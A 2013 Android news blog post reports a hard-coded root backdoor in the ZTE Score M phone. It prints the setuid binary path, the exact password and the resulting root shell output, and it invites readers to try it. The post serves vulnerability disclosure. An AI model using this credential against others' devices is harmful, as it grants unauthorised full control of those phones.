[Security] ZTE Phones have a root backdoor?

377 days ago by 2

It’s appearing that a root backdoor has appeared in ZTE phones, allowing full root to devices. It simply provides a root shell using a hard-coded password. This is serious news for any hackers, as this command can cause major damage to phones.

Here is the information, should you wish to have a go:

The ZTE Score M is an Android 2.3.4 (Gingerbread) phone available in the United States on MetroPCS, made by Chinese telecom ZTE Corporation.

There is a setuid-root application at /system/bin/sync_agent that serves no function besides providing a root shell backdoor on the device.  Just give the magic, hard-coded password to get a root shell:

$ sync_agent ztex1609523
# id
uid=0(root) gid=0(root)

Nice backdoor, ZTE.

It is confirmed on these devices:

If you have tested and got this to work for your devices, tell us in the comments or on any social networks.
We should know more when ZTE makes an announcement as to why this was included.

Source via Justin Case

Tags: , ,


I'm Joe and I'm an App Developer and just a general geek who likes to try new thing but make sure they work well for the majority of people and not just geeks. Here at Land Of Droid, I'll be posting some cool apps that I find out and about the web!

Share This Post

Related Articles

© 2013 Land of Droid – Google Android News – ROMS – Phones – Tablets – Opinions – Apps – Reviews. All rights reserved. · Entries RSS · Comments RSS